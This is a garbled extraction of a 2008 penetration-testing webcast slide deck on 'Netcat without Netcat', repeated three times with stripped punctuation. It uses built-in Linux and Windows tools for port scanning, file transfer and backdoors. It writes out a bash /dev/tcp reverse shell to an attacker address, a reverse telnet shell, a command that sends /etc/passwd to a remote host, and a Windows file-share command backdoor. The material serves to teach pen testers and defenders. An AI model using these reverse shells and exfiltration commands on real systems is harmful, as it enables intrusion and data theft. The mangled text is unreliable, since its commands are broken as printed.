bull On most Linux variants (except Debian-derivedsystems like Ubuntu) the default built-in bash canredirect to and from devtcp[IPaddr][port]
ndash Opens a connection with the target IPaddr on that portbull With a little command-line magic we can use this for
Netcat-like behavior
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 16
Linux Command-Line File
Transfer
bull To send a file we can just redirect itscontents into devtcp[IPaddr][port] as in
bull $ cat etcpasswd gt
devtcp[IPaddr][port]bull Catch it on the other side with a Netcat
listener
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 17
Linux Command-Line
Backdoor via devtcpbull We can connect Standard In Standard Out and Standard Error
of a bash shell to devtcp to implement a reverse shellbackdoor
binbash ndashi gt
devtcp[Attacker_IPaddr][port] 0ltamp1
2gtamp1
bull Shovels a shell from the victim Linux machine to attackerrsquoswaiting Netcat listener where commands can be entered
binbash ndashi gt
devtcp
[Attacker_IPaddr]
[port] 0ltamp1 2gtamp1
Firewall
Blocks
incoming
Protected Servernc ndashl ndashp [p]
TYPE COMMANDS
HERE
Commands
executed
here
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 18
Linux Command-Line Reverse
Shell Backdoor In Action
Li C d Li P t
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 19
Linux Command-Line Port
Scannerbull To see if a single port is open we could run$ echo gt devtcp[IPaddr][port]
bull Note that the ldquoConnection Refusedrdquo text is not placed onStandard Output or Standard Error ndash The shell puts them in line so we cannot redirect them to a file
Port 80 is listening
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20
Storing Results and Iterating
bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed
bull For a port scanner we could use a while loop
that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==
0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done
bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for
pen testers
d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21
Command-Line Port Scanner
In Action
5 Not Closed
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22
Linux Command-Line
Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote
shell without using devtcpbull Linux telnet clients let us redirect Standard In and
Standard Out
bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |
binbash | telnet [attacker_IPaddr][port2]
bull Provide commands on attackerrsquos machine via port1
bull Receive output on attackerrsquos machine on port2
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23
Reverse Telnet Shell in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 16
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 16
Linux Command-Line File
Transfer
bull To send a file we can just redirect itscontents into devtcp[IPaddr][port] as in
bull $ cat etcpasswd gt
devtcp[IPaddr][port]bull Catch it on the other side with a Netcat
listener
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 17
Linux Command-Line
Backdoor via devtcpbull We can connect Standard In Standard Out and Standard Error
of a bash shell to devtcp to implement a reverse shellbackdoor
binbash ndashi gt
devtcp[Attacker_IPaddr][port] 0ltamp1
2gtamp1
bull Shovels a shell from the victim Linux machine to attackerrsquoswaiting Netcat listener where commands can be entered
binbash ndashi gt
devtcp
[Attacker_IPaddr]
[port] 0ltamp1 2gtamp1
Firewall
Blocks
incoming
Protected Servernc ndashl ndashp [p]
TYPE COMMANDS
HERE
Commands
executed
here
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 18
Linux Command-Line Reverse
Shell Backdoor In Action
Li C d Li P t
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 19
Linux Command-Line Port
Scannerbull To see if a single port is open we could run$ echo gt devtcp[IPaddr][port]
bull Note that the ldquoConnection Refusedrdquo text is not placed onStandard Output or Standard Error ndash The shell puts them in line so we cannot redirect them to a file
Port 80 is listening
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20
Storing Results and Iterating
bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed
bull For a port scanner we could use a while loop
that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==
0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done
bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for
pen testers
d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21
Command-Line Port Scanner
In Action
5 Not Closed
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22
Linux Command-Line
Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote
shell without using devtcpbull Linux telnet clients let us redirect Standard In and
Standard Out
bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |
binbash | telnet [attacker_IPaddr][port2]
bull Provide commands on attackerrsquos machine via port1
bull Receive output on attackerrsquos machine on port2
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23
Reverse Telnet Shell in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 17
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 17
Linux Command-Line
Backdoor via devtcpbull We can connect Standard In Standard Out and Standard Error
of a bash shell to devtcp to implement a reverse shellbackdoor
binbash ndashi gt
devtcp[Attacker_IPaddr][port] 0ltamp1
2gtamp1
bull Shovels a shell from the victim Linux machine to attackerrsquoswaiting Netcat listener where commands can be entered
binbash ndashi gt
devtcp
[Attacker_IPaddr]
[port] 0ltamp1 2gtamp1
Firewall
Blocks
incoming
Protected Servernc ndashl ndashp [p]
TYPE COMMANDS
HERE
Commands
executed
here
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 18
Linux Command-Line Reverse
Shell Backdoor In Action
Li C d Li P t
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 19
Linux Command-Line Port
Scannerbull To see if a single port is open we could run$ echo gt devtcp[IPaddr][port]
bull Note that the ldquoConnection Refusedrdquo text is not placed onStandard Output or Standard Error ndash The shell puts them in line so we cannot redirect them to a file
Port 80 is listening
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20
Storing Results and Iterating
bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed
bull For a port scanner we could use a while loop
that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==
0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done
bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for
pen testers
d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21
Command-Line Port Scanner
In Action
5 Not Closed
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22
Linux Command-Line
Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote
shell without using devtcpbull Linux telnet clients let us redirect Standard In and
Standard Out
bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |
binbash | telnet [attacker_IPaddr][port2]
bull Provide commands on attackerrsquos machine via port1
bull Receive output on attackerrsquos machine on port2
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23
Reverse Telnet Shell in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
